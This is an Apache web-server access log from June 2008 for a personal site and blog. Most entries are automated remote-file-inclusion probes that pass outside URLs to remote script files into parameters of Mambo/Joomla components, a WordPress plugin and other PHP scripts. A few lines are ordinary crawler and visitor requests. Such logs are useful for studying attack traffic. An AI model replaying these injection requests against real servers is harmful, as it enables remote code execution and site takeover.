216.127.70.91 - - [09/Jun/2008:08:16:38 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://4wdnews.com.au/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
72.14.199.72 - - [09/Jun/2008:08:18:16 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
89.108.67.119 - - [09/Jun/2008:08:19:13 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
89.108.67.119 - - [09/Jun/2008:08:19:13 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
67.19.216.122 - - [09/Jun/2008:08:19:21 -0700] "GET //skin/zero_vote/error.php?dir=http://ninguem.t35.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.notahamsandwich.com"
207.218.234.146 - - [09/Jun/2008:08:20:56 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
207.218.234.146 - - [09/Jun/2008:08:20:56 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
207.218.234.146 - - [09/Jun/2008:08:20:56 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
207.218.234.146 - - [09/Jun/2008:08:21:17 -0700] "GET /logs/access.log//wp-content/plugins/./wordtube-button.php?wpPATH=http://www.indigonetzwerk.de/mambo/editor/id1? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
207.218.234.146 - - [09/Jun/2008:08:21:17 -0700] "GET //wp-content/plugins/./wordtube-button.php?wpPATH=http://www.indigonetzwerk.de/mambo/editor/id1? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
207.218.234.146 - - [09/Jun/2008:08:21:17 -0700] "GET /logs//wp-content/plugins/./wordtube-button.php?wpPATH=http://www.indigonetzwerk.de/mambo/editor/id1? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
206.221.179.200 - - [09/Jun/2008:08:21:36 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
206.221.179.200 - - [09/Jun/2008:08:21:36 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
206.221.179.200 - - [09/Jun/2008:08:21:36 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
211.224.129.124 - - [09/Jun/2008:08:24:35 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
62.233.130.174 - - [09/Jun/2008:08:24:36 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
62.233.130.174 - - [09/Jun/2008:08:24:36 -0700] "GET //component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
62.233.130.174 - - [09/Jun/2008:08:24:36 -0700] "GET /logs//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
84.19.178.202 - - [09/Jun/2008:08:24:37 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
84.19.178.202 - - [09/Jun/2008:08:24:37 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
207.218.234.146 - - [09/Jun/2008:08:24:51 -0700] "GET /logs/access_080421.log//wp-content/plugins/./wordtube-button.php?wpPATH=http://www.indigonetzwerk.de/mambo/editor/id1? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
91.121.87.84 - - [09/Jun/2008:08:25:19 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
211.224.129.124 - - [09/Jun/2008:08:25:26 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
211.224.129.124 - - [09/Jun/2008:08:25:26 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
89.108.67.119 - - [09/Jun/2008:08:25:30 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
89.108.67.119 - - [09/Jun/2008:08:25:30 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
213.194.149.215 - - [09/Jun/2008:08:26:32 -0700] "GET /logs/access_080519.log//bbs/skin/zero_vote/setup.php?dir=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
203.22.204.160 - - [09/Jun/2008:08:28:41 -0700] "GET /logs/access.log//wp-content/plugins/./wordtube-button.php?wpPATH=http://www.geocities.com/mirza.putri/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.notahamsandwich.com"
211.224.129.124 - - [09/Jun/2008:08:30:08 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
203.22.204.160 - - [09/Jun/2008:08:32:27 -0700] "GET /logs/access_080421.log//wp-content/plugins/./wordtube-button.php?wpPATH=http://www.geocities.com/mirza.putri/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.notahamsandwich.com"
77.232.68.10 - - [09/Jun/2008:08:32:31 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
77.232.68.10 - - [09/Jun/2008:08:32:31 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
77.232.68.10 - - [09/Jun/2008:08:32:32 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
202.221.143.111 - - [09/Jun/2008:08:32:40 -0700] "GET /logs/access.log//wp-content/plugins/./wordtube-button.php?wpPATH=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
202.221.143.111 - - [09/Jun/2008:08:32:40 -0700] "GET /logs//wp-content/plugins/./wordtube-button.php?wpPATH=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
202.221.143.111 - - [09/Jun/2008:08:35:22 -0700] "GET /logs/access_080421.log//wp-content/plugins/./wordtube-button.php?wpPATH=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
203.130.242.48 - - [09/Jun/2008:08:36:30 -0700] "GET /http://rootmybox.org/index.php?show=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
211.239.161.10 - - [09/Jun/2008:08:37:45 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
216.120.241.242 - - [09/Jun/2008:08:38:39 -0700] "GET /logs/access.log/errors.php?error=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
216.120.241.242 - - [09/Jun/2008:08:38:39 -0700] "GET /errors.php?error=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
216.120.241.242 - - [09/Jun/2008:08:38:39 -0700] "GET /logs/errors.php?error=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
89.108.67.119 - - [09/Jun/2008:08:41:36 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
89.108.67.119 - - [09/Jun/2008:08:41:36 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
62.233.130.174 - - [09/Jun/2008:08:42:14 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
62.233.130.174 - - [09/Jun/2008:08:42:14 -0700] "GET //component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
62.233.130.174 - - [09/Jun/2008:08:42:15 -0700] "GET /logs//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
203.130.242.48 - - [09/Jun/2008:08:52:03 -0700] "GET /logs/access.log/http://rootmybox.org/index.php?show=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
203.130.242.48 - - [09/Jun/2008:08:52:04 -0700] "GET /http://rootmybox.org/index.php?show=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
203.130.242.48 - - [09/Jun/2008:08:52:05 -0700] "GET /logs/http://rootmybox.org/index.php?show=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
81.174.65.190 - - [09/Jun/2008:08:52:33 -0700] "GET //include/admin.lib.inc.php?site_path=http://www.exacta-learning.com//images/.bash/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
81.174.65.190 - - [09/Jun/2008:08:52:37 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.exacta-learning.com//images/.bash/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
81.174.65.190 - - [09/Jun/2008:08:52:41 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.exacta-learning.com//images/.bash/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
217.225.98.238 - - [09/Jun/2008:08:53:59 -0700] "GET / HTTP/1.1" 200 514 "http://www.poppymom.com/archives/2006/06/shit_mittens.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "blog.notahamsandwich.com"
217.225.98.238 - - [09/Jun/2008:08:54:00 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "blog.notahamsandwich.com"
193.64.244.176 - - [09/Jun/2008:08:56:49 -0700] "GET /logs///newspublish/include.php?path%5Bdocroot%5D=http://www.indicce.com/admin/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
208.116.44.60 - - [09/Jun/2008:08:57:13 -0700] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
208.116.44.60 - - [09/Jun/2008:08:57:13 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
66.128.59.36 - - [09/Jun/2008:09:01:10 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.imgshost.com/userfiles/c5df6912.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.notahamsandwich.com"
66.128.59.36 - - [09/Jun/2008:09:01:10 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.imgshost.com/userfiles/c5df6912.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.notahamsandwich.com"
66.128.59.36 - - [09/Jun/2008:09:01:11 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.imgshost.com/userfiles/c5df6912.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.notahamsandwich.com"
216.127.70.91 - - [09/Jun/2008:09:01:12 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
216.127.70.91 - - [09/Jun/2008:09:01:13 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
216.127.70.91 - - [09/Jun/2008:09:01:13 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
67.225.142.146 - - [09/Jun/2008:09:03:16 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
69.89.22.130 - - [09/Jun/2008:09:09:40 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.axelfoto.com/sr/editor_uploads/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
69.89.22.130 - - [09/Jun/2008:09:09:40 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.axelfoto.com/sr/editor_uploads/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
69.89.22.130 - - [09/Jun/2008:09:09:41 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.axelfoto.com/sr/editor_uploads/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
62.149.175.25 - - [09/Jun/2008:09:10:44 -0700] "GET /logs///newspublish/include.php?path%5Bdocroot%5D=http://www.indicce.com/admin/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
64.136.58.116 - - [09/Jun/2008:09:12:04 -0700] "GET /errors.php?error=http://www.avedila.com/avedila/.../ngalbaa.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
64.136.58.116 - - [09/Jun/2008:09:12:37 -0700] "GET /errors.php?error=http://www.avedila.com/avedila/.../peler.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
216.127.70.91 - - [09/Jun/2008:09:15:02 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://4wdnews.com.au/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
72.14.199.23 - - [09/Jun/2008:09:18:16 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
83.223.116.60 - - [09/Jun/2008:09:28:19 -0700] "GET /?dir=http://ipnosiolistica.org/images/poiid.txt???? HTTP/1.1" 200 912 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
83.223.116.60 - - [09/Jun/2008:09:28:19 -0700] "GET /logs/?dir=http://ipnosiolistica.org/images/poiid.txt???? HTTP/1.1" 200 7659 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
64.136.58.116 - - [09/Jun/2008:09:31:58 -0700] "GET /logs/access.log/errors.php?error=http://www.avedila.com/avedila/.../peler.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
64.136.58.116 - - [09/Jun/2008:09:31:58 -0700] "GET /logs/errors.php?error=http://www.avedila.com/avedila/.../peler.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
83.223.116.60 - - [09/Jun/2008:09:32:00 -0700] "GET /logs/access.log/?dir=http://ipnosiolistica.org/images/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
64.136.58.116 - - [09/Jun/2008:09:32:07 -0700] "GET /logs/access.log/errors.php?error=http://www.avedila.com/avedila/.../ngalbaa.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
64.136.58.116 - - [09/Jun/2008:09:32:07 -0700] "GET /logs/errors.php?error=http://www.avedila.com/avedila/.../ngalbaa.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
213.203.222.50 - - [09/Jun/2008:09:46:56 -0700] "GET /logs/access.log/errors.php?error=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
213.203.222.50 - - [09/Jun/2008:09:46:56 -0700] "GET /errors.php?error=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
213.203.222.50 - - [09/Jun/2008:09:46:56 -0700] "GET /logs/errors.php?error=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
212.227.65.79 - - [09/Jun/2008:09:50:44 -0700] "GET /logs/errors.php?error=http://www.immo-marrakech.com/files/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.notahamsandwich.com"
212.227.65.79 - - [09/Jun/2008:09:50:44 -0700] "GET /errors.php?error=http://www.immo-marrakech.com/files/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.notahamsandwich.com"
213.193.215.56 - - [09/Jun/2008:09:57:59 -0700] "GET /logs/errors.php?error=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
213.193.215.56 - - [09/Jun/2008:09:57:59 -0700] "GET /errors.php?error=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
213.203.222.50 - - [09/Jun/2008:10:01:08 -0700] "GET /logs/access.log/errors.php?error=http://nmbsquad.freehostia.com//b1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
213.203.222.50 - - [09/Jun/2008:10:01:09 -0700] "GET /logs/access.log/errors.php?error=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
213.203.222.50 - - [09/Jun/2008:10:01:09 -0700] "GET /errors.php?error=http://nmbsquad.freehostia.com//b1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
213.203.222.50 - - [09/Jun/2008:10:01:09 -0700] "GET /errors.php?error=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
213.203.222.50 - - [09/Jun/2008:10:01:09 -0700] "GET /logs/errors.php?error=http://nmbsquad.freehostia.com//b1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
213.203.222.50 - - [09/Jun/2008:10:01:09 -0700] "GET /logs/errors.php?error=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
213.193.215.56 - - [09/Jun/2008:10:16:05 -0700] "GET /logs/access.log/errors.php?error=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
213.193.215.56 - - [09/Jun/2008:10:16:06 -0700] "GET /errors.php?error=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
213.193.215.56 - - [09/Jun/2008:10:16:06 -0700] "GET /logs/errors.php?error=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
72.14.199.32 - - [09/Jun/2008:10:18:16 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
72.47.201.117 - - [09/Jun/2008:10:36:39 -0700] "GET //errors.php?error=http://www.geocities.com/vianarina/test.gif??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.notahamsandwich.com"
72.47.201.117 - - [09/Jun/2008:10:36:58 -0700] "GET /logs//errors.php?error=http://www.geocities.com/vianarina/test.gif??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.notahamsandwich.com"
74.6.18.233 - - [09/Jun/2008:11:07:05 -0700] "GET /blog/?S=A HTTP/1.0" 200 506 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.notahamsandwich.com"
72.14.199.23 - - [09/Jun/2008:11:18:16 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
193.224.55.172 - - [09/Jun/2008:11:19:21 -0700] "GET /logs/errors.php?error=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
193.224.55.172 - - [09/Jun/2008:11:19:22 -0700] "GET /errors.php?error=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
207.58.164.77 - - [09/Jun/2008:11:21:14 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.notahamsandwich.com"
207.58.164.77 - - [09/Jun/2008:11:21:14 -0700] "GET //component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.notahamsandwich.com"
207.58.164.77 - - [09/Jun/2008:11:21:14 -0700] "GET /logs//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.notahamsandwich.com"
67.195.37.90 - - [09/Jun/2008:11:22:21 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.notahamsandwich.com"
67.195.37.90 - - [09/Jun/2008:11:22:42 -0700] "GET /blog/?D=A HTTP/1.0" 200 506 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.notahamsandwich.com"
72.47.201.117 - - [09/Jun/2008:11:23:02 -0700] "GET //errors.php?error=http://sobangnara.com/board/data/.init/est.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.notahamsandwich.com"
72.47.201.117 - - [09/Jun/2008:11:23:02 -0700] "GET /logs//errors.php?error=http://sobangnara.com/board/data/.init/est.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.notahamsandwich.com"
206.221.179.200 - - [09/Jun/2008:11:23:43 -0700] "GET /poll/comments.php?id=http://supervisa.com.mx/up.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.notahamsandwich.com"
